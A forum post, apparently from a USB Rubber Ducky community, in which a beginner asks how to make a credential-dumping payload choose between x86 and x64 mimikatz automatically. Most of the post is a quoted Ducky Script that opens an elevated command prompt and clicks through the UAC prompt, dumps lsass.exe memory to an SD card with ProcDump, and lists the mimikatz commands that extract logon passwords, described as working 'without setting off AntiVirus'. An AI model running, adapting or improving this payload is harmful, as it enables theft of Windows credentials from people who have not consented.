Applenuts

  1. * ^ * Note~ I am trying to add something from the Ducky Tool Kit Payload Generator to the above code.
  2. Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimikatz\ProcDump payload. My issue lies in the fact that I have to switch the mimikatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then plugging in, swapping files, and so on. Or having separate .bins (SHIFT+payload button or CTRL+payload button, etc.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE

     *****************************************************************************************************************************************************************************
     REM Author: Hak5Darren with the help of:
     REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
     REM
     REM Description: "Backup" Windows Passwords without setting off AntiVirus
     REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
     REM Passwords can later be extracted using mimikatz.
     REM
     REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
     REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
     REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
     REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
     REM
     REM Target: Windows Vista/7/8, Win32/x64
     REM *** UAC Bypass ***
     DELAY 2000
     WINDOWS r
     DELAY 200
     STRING powershell Start-Process cmd.exe -Verb runAs
     ENTER
     DELAY 2000
     ALT y
     DELAY 500
     REM *** Define DUCKY drive as %duck%
     STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
     ENTER
     DELAY 500
     REM *** Execute procdump from SD card and save log file to disk ***
     STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
     ENTER
     REM *** GTFO ***
     STRING exit
     ENTER
     REM *** Post Exploitation ***
     REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
     REM directory including the version of mimikatz for your targets architecture
     REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
     REM mimikatz.exe <enter>
     REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
     REM sekurlsa::logonPasswords full <enter>
     *****************************************************************************************************************************************************************************